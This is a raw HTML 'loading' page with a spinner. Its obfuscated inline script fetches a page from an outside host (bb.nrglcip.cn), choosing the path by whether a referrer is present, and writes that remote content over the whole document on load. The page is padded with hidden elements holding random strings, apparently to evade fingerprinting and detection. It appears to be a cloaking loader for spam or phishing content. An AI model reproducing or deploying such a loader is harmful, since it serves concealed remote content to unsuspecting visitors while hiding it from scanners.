<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Dm2fLzBL {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Dm2fLzBL .x3x7c3fU4BP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Dm2fLzBL .content {
            line-height: 50px;
            text-align: center
        }

        .Dm2fLzBL .img {
            width: 100%
        }

        .Dm2fLzBL .AuP7mfF4 {
            text-align: center
        }

        .Dm2fLzBL .AuP7mfF4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Dm2fLzBL .AuP7mfF4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Dm2fLzBL .AuP7mfF4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Dm2fLzBL .AuP7mfF4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Dm2fLzBL .AuP7mfF4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Dm2fLzBL .AuP7mfF4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Dm2fLzBL .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Cf9DtYRL4k(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var urR7Q3i = Cf9DtYRL4k('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ urR7Q3i +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ urR7Q3i +".html?a=share";
		}
		
        qLB690P5iN=url+"#"+new Date().getTime();
        qLB690P5iN && function() {
            $.get(qLB690P5iN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>jycrYufDwTUhX0cMJzYv79Cle1SBZda9kt2PNGRC7MODOw1HyNYzBUJMiQwyeaCJQGYzECcIXmz10qfzXGL1qU79</a>
<h1 style='display:none' >ZQiJv3iKvjIr2UDNIQzxHkEDYlhEFtiaqnXBm</h1>
<span style='display:none'>c3TKG0pClR4bUsLtLsiV73QMJmIDfhN9L0Cz6UyVsOwLiwxuVqyFJz4rc7I4a3V3JGDG9ZtN</span>
<b style='display:none' >dQ57PJGRGXJ0</b>
<img  src='' style='display:none'>
<p  style='display:none'>r8TwenB2hZUS9VVCOykQwcGLEO7nPjegcyHMd53JKeRpa0QD2v5T9ghs2YE</p>
<li style='display:none' >HZFQ5DAbAfAICKggQ3JLZmtuYganpzQkqfSN7gt4uRQhlTDAUMcDUJTKa8pMLSENFhBNLKyH3IVLsvzNnMK5SICxlaIc7</li>
<h1 style='display:none' >ZQiJv3iKvjIr2UDNIQzxHkEDYlhEFtiaqnXBm</h1>
<div style='display:none'>K3Jk28Nfjc0FQxnTZQtfei62br38njCuaAOIIoiU7hRF2R1xXKFryxTZQMXyAI4QXH7ecMlZqFBrdnaNhqd</div>
<h1 style='display:none' >ZQiJv3iKvjIr2UDNIQzxHkEDYlhEFtiaqnXBm</h1><div class="Dm2fLzBL">
    <div class="x3x7c3fU4BP">
        <div class="AuP7mfF4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >BB7yaBiuMITNBbv8nI</ul>
<a  href='#' style='display:none'>NayNq4pNj3B3oP6IH2HYQVsFvXauZNRYgIXJI5bG9dBbfXMqwiryc2qElGHJK7dC9Sn78mkSUje0hfhlXp7oaY15MA7drA7u6dDC</a>
<img  src='' style='display:none'>
<li style='display:none' >qW8Tj3mnRa4KHJQLAelHM2vkQhx7dW6RWqBy9oZCSVqRdNYa6qCpCDivc</li>
<ul style='display:none' >BB7yaBiuMITNBbv8nI</ul>
<b style='display:none' >WBfkqFLRxZz9lwJHODSrwoV60tDaOetb8L4Ff4P7MC6j7iS73</b>
<img  src='' style='display:none'>
<ul style='display:none' >BB7yaBiuMITNBbv8nI</ul></body>
</html>